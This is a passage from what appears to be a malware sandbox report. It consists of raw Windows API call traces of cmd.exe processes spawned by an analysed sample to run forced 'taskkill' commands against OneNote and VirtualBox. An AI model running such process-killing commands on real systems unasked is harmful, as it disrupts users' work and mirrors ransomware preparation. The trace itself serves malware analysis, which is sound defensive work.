0x2 [0060.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f080, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f080) returned 0x5a3490 [0060.767] GetProcessHeap () returned 0x590000 [0060.767] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a34d0, Size=0x4) returned 0x5a34d0 [0060.767] FindClose (in: hFindFile=0x5a3490 | out: hFindFile=0x5a3490) returned 1 [0060.767] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.767] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.767] GetConsoleTitleW (in: lpConsoleTitle=0x18f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f4c8 | out: lpAttributeList=0x18f400, lpSize=0x18f4c8) returned 1 [0060.767] UpdateProcThreadAttribute (in: lpAttributeList=0x18f400, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f400, lpPreviousValue=0x0) returned 1 [0060.768] GetStartupInfoW (in: lpStartupInfo=0x18f3bc | out: lpStartupInfo=0x18f3bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.768] GetProcessHeap () returned 0x590000 [0060.768] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5a3490 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.769] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.769] GetProcessHeap () returned 0x590000 [0060.769] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a3490 | out: hHeap=0x590000) returned 1 [0060.769] GetProcessHeap () returned 0x590000 [0060.769] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa) returned 0x59ff18 [0060.769] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.770] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im onenote.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f45c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im onenote.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f4a8 | out: lpCommandLine="taskkill /f /im onenote.exe", lpProcessInformation=0x18f4a8*(hProcess=0x78, hThread=0x74, dwProcessId=0x738, dwThreadId=0x534)) returned 1 [0060.972] CloseHandle (hObject=0x74) returned 1 [0060.972] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.972] GetProcessHeap () returned 0x590000 [0060.972] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f08 | out: hHeap=0x590000) returned 1 [0060.972] GetEnvironmentStringsW () returned 0x5a5f08* [0060.972] GetProcessHeap () returned 0x590000 [0060.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a40c8 [0060.972] FreeEnvironmentStringsW (penv=0x5a5f08) returned 1 [0060.972] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.011] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x80) returned 1 [0071.011] CloseHandle (hObject=0x78) returned 1 [0071.011] _vsnwprintf (in: _Buffer=0x18f4e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a8 | out: _Buffer="00000080") returned 8 [0071.011] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.011] GetProcessHeap () returned 0x590000 [0071.012] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a40c8 | out: hHeap=0x590000) returned 1 [0071.012] GetEnvironmentStringsW () returned 0x5a40c8* [0071.012] GetProcessHeap () returned 0x590000 [0071.012] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a95b0 [0071.012] FreeEnvironmentStringsW (penv=0x5a40c8) returned 1 [0071.012] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.012] GetProcessHeap () returned 0x590000 [0071.012] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a95b0 | out: hHeap=0x590000) returned 1 [0071.012] GetEnvironmentStringsW () returned 0x5a40c8* [0071.012] GetProcessHeap () returned 0x590000 [0071.012] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a95b0 [0071.012] FreeEnvironmentStringsW (penv=0x5a40c8) returned 1 [0071.012] GetProcessHeap () returned 0x590000 [0071.012] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59ff18 | out: hHeap=0x590000) returned 1 [0071.012] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f400 | out: lpAttributeList=0x18f400) [0071.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.012] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.012] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.013] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.013] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.013] SetConsoleInputExeNameW () returned 0x1 [0071.013] GetConsoleOutputCP () returned 0x1b5 [0071.013] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.013] exit (_Code=128) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x9559000" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im virtualboxvm.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0xbec [0061.673] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f79c | out: lpSystemTimeAsFileTime=0x34f79c*(dwLowDateTime=0x949ffc50, dwHighDateTime=0x1d57b18)) [0061.673] GetCurrentProcessId () returned 0xbe8 [0061.673] GetCurrentThreadId () returned 0xbec [0061.673] GetTickCount () returned 0x1149d88 [0061.673] QueryPerformanceCounter (in: lpPerformanceCount=0x34f794 | out: lpPerformanceCount=0x34f794*=18189463231) returned 1 [0061.674] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0061.674] __set_app_type (_Type=0x1) [0061.674] __p__fmode () returned 0x74eb31f4 [0061.674] __p__commode () returned 0x74eb31fc [0061.674] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0061.674] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0061.675] GetCurrentThreadId () returned 0xbec [0061.675] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x60 [0061.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.675] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0061.675] SetThreadUILanguage (LangId=0x0) returned 0x409 [0061.675] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0061.675] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34f72c | out: phkResult=0x34f72c*=0x0) returned 0x2 [0061.676] VirtualQuery (in: lpAddress=0x34f763, lpBuffer=0x34f6fc, dwLength=0x1c | out: lpBuffer=0x34f6fc*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.676] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34f6fc, dwLength=0x1c | out: lpBuffer=0x34f6fc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0061.676] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34f6fc, dwLength=0x1c | out: lpBuffer=0x34f6fc*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0061.676] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34f6fc, dwLength=0x1c | out: lpBuffer=0x34f6fc*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.676] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34f6fc, dwLength=0x1c | out: lpBuffer=0x34f6fc*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0061.676] GetConsoleOutputCP () returned 0x1b5 [0061.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.676] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0061.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.676] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0061.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0061.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.677] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0061.677] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.677] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0061.677] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.677] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0061.677] GetEnvironmentStringsW () returned 0x462058* [0061.677] GetProcessHeap () returned 0x450000 [0061.677] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xaca) returned 0x462b30 [0061.677] FreeEnvironmentStringsW (penv=0x462058) returned 1 [0061.678] GetProcessHeap () returned 0x450000 [0061.678] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4) returned 0x460c90 [0061.678] GetEnvironmentStringsW () returned 0x462058* [0061.678] GetProcessHeap () returned 0x450000 [0061.678] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xaca) returned 0x463608 [0061.678] FreeEnvironmentStringsW (penv=0x462058) returned 1 [0061.678] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e69c | out: phkResult=0x34e69c*=0x68) returned 0x0 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x0, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x1, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x1, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x0, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x40, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x40, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.678] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x40, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.678] RegCloseKey (hKey=0x68) returned 0x0 [0061.678] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e69c | out: phkResult=0x34e69c*=0x68) returned 0x0 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x40, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x1, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x1, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x0, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x9, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x4, lpData=0x34e6a8*=0x9, lpcbData=0x34e6a0*=0x4) returned 0x0 [0061.679] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e6a4, lpData=0x34e6a8, lpcbData=0x34e6a0*=0x1000 | out: lpType=0x34e6a4*=0x0, lpData=0x34e6a8*=0x9, lpcbData=0x34e6a0*=0x1000) returned 0x2 [0061.679] RegCloseKey (hKey=0x68) returned 0x0 [0061.679] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebae [0061.679] srand (_Seed=0x5d97ebae) [0061.679] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im virtualboxvm.exe" [0061.679] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im virtualboxvm.exe" [0061.679] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.679] GetProcessHeap () returned 0x450000 [0061.679] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x462058 [0061.679] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x462060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0061.680] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.680] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.680] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.680] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0061.680] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0061.680] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0061.680] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0061.680] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0061.680] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0061.680] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0061.680] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0061.680] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0061.680] GetProcessHeap () returned 0x450000 [0061.680] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x462b30 | out: hHeap=0x450000) returned 1 [0061.680] GetEnvironmentStringsW () returned 0x462270* [0061.680] GetProcessHeap () returned 0x450000 [0061.680] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xae2) returned 0x464bd0 [0061.680] FreeEnvironmentStringsW (penv=0x462270) returned 1 [0061.680] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0061.680] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.680] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0061.680] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0061.680] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0061.680] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0061.680] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0061.680] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0061.680] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0061.680] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0061.680] GetProcessHeap () returned 0x450000 [0061.680] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x54) returned 0x4656c0 [0061.681] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f468 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.681] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f468, lpFilePart=0x34f464 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f464*="Desktop") returned 0x25 [0061.681] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.681] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f1e4 | out: lpFindFileData=0x34f1e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x461ed8 [0061.681] FindClose (in: hFindFile=0x461ed8 | out: hFindFile=0x461ed8) returned 1 [0061.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f1e4 | out: lpFindFileData=0x34f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x461ed8 [0061.681] FindClose (in: hFindFile=0x461ed8 | out: hFindFile=0x461ed8) returned 1 [0061.681] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0061.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f1e4 | out: lpFindFileData=0x34f1e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x461ed8 [0061.681] FindClose (in: hFindFile=0x461ed8 | out: hFindFile=0x461ed8) returned 1 [0061.681] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.681] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0061.681] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0061.681] GetProcessHeap () returned 0x450000 [0061.682] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464bd0 | out: hHeap=0x450000) returned 1 [0061.682] GetEnvironmentStringsW () returned 0x4640e0* [0061.682] GetProcessHeap () returned 0x450000 [0061.682] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb36) returned 0x465f20 [0061.682] 